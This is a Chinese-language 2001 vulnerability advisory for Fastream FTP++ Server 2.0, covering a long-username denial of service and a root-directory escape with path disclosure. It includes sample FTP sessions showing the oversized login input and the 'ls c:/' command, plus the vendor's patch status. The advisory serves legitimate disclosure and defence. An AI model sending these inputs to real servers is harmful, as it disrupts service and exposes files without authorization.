Fastream FTP++ 存在多个安全漏洞
发布日期:2001-01-27
更新日期:2001-01-27
受影响系统:
Fastream FTP++Server 2.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
- Microsoft Windows NT 2000
描述:
BUGTRAQ ID:2261
CVE(CAN) ID:
CAN-2001-0256
Fastream FTP++ Server是一个客户端/服务器应用程序,用来在internet上的计
算机中下载和上传文件。
SNS研究小组发现它存在多个安全漏洞:
1. 拒绝服务漏洞
如果发送一个超过2048字节的请求,可能导致FaSTream内置的ftp服务器停止
响应。
例如:
C:\>ftp victimserver
Connected to victimserver
220 Fastream FTP++ 2 Server Ready
User (victimserver:(none)): aaaaaaaaaaaaaaaaaa(2048 bytes)
此后,服务器仍然继续接受连接请求,但是不会再对提供的命令进行响应。
2. 路径泄漏以及目录浏览漏洞
当ftp server的root目录被设置之后,任意能够访问ftp server的用户
不仅能够看到此目录的路径而且可以突破root目录,得到其他驱动器和目录
的内容列表。
ftp> pwd
257 "/C:/FTPROOT/" is current directory.
ftp> ls c:/
200 Port command successful.
150 Opening data connection for directory list.
(listing of c:\)
226 File sent ok
ftp: xx bytes received in x.xx seconds xxKbytes/sec.
<*来源:SNS Research (
vuln-dev@greyhack.com) *>
建议:
厂商补丁:
厂商已经提供了FaSTream FTP++ Beta 10 Build 3,它解决了目录泄漏问题,
但是拒绝服务问题仍然没有解决。
浏览次数:4099
严重程度:0(网友投票)